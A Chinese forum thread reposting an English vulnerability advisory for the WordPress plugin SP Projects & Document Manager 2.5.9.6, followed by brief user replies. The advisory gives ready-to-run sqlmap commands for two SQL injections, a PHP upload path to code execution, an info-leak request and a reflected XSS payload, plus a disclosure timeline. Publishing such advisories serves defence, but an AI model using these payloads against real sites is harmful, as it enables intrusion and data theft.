人=族 发表于 2016-3-9 10:43:01

WordPress的SP项目与文档管理器2.5.9.6 XSS / SQL注入

本帖最后由 人=族 于 2016-3-10 10:26 编辑

* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
===============================================================================

The Wordpress plugin "SP Projects & Document Manager" contains several
vulnerabilities: arbitrary file upload and code execution by registered users,
sql injections, information leakage and xss by unregistered users.

PoC
===============================================================================


1. SQL-Injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections have been known in version 2.4.1 but have been fixed in between.
At least two of them reappeared in version 2.5.9.6:

- The injections in the "id"-parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=download-project&id=1

- and the POST-Parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/
ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/\
WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\
-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \
OR (1=1 *" --dbms mysql



2. Arbitrary code executions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET
request to their specific location in the default upload path (which can vary
depending on the configuration of the plugin). The URL to uploaded files typically
looks like

/wp-content/uploads/sp-client-document-manager//

eg
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\
/1/shell.php

Files can even be accessed directly if the option "Require Login to Download"
is checked in the plugin configuration.


3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by non-logged in users via a
call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=get-file-info&id=1

-- response --
200 OK
Date: Wed, 13 Jan 2016 22:17:46 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 211
Connection: close
Content-Type: application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\
"cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\
"form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------

Specifically you can retrieve info about the upload user id and filename
to determine the URL for direct access to the file (see 3).

4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file
for function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\
/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --
200 OK
Date: Sun, 06 Mar 2016 10:00:30 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 101
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\
</script></p>
---------------


Timeline
===============================================================================

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


Solution
===============================================================================

Update to latest version

张小强 发表于 2016-3-9 10:50:02

看下是什么

我叫齐齐 发表于 2016-3-9 11:38:45

看下是什么

面包加火腿 发表于 2016-3-9 13:49:30

又是wordpress看看是什么

昊情· 发表于 2016-3-9 14:11:48

wordpress

0licej 发表于 2016-3-9 14:57:13

学习一下。。。。。。

lobsangnorbu 发表于 2016-3-9 16:37:07

中国红客,千秋万代!

小圈圈 发表于 2016-3-9 20:42:48

又要回复,,:(
页: [1]
查看完整版本: WordPress的SP项目与文档管理器2.5.9.6 XSS / SQL注入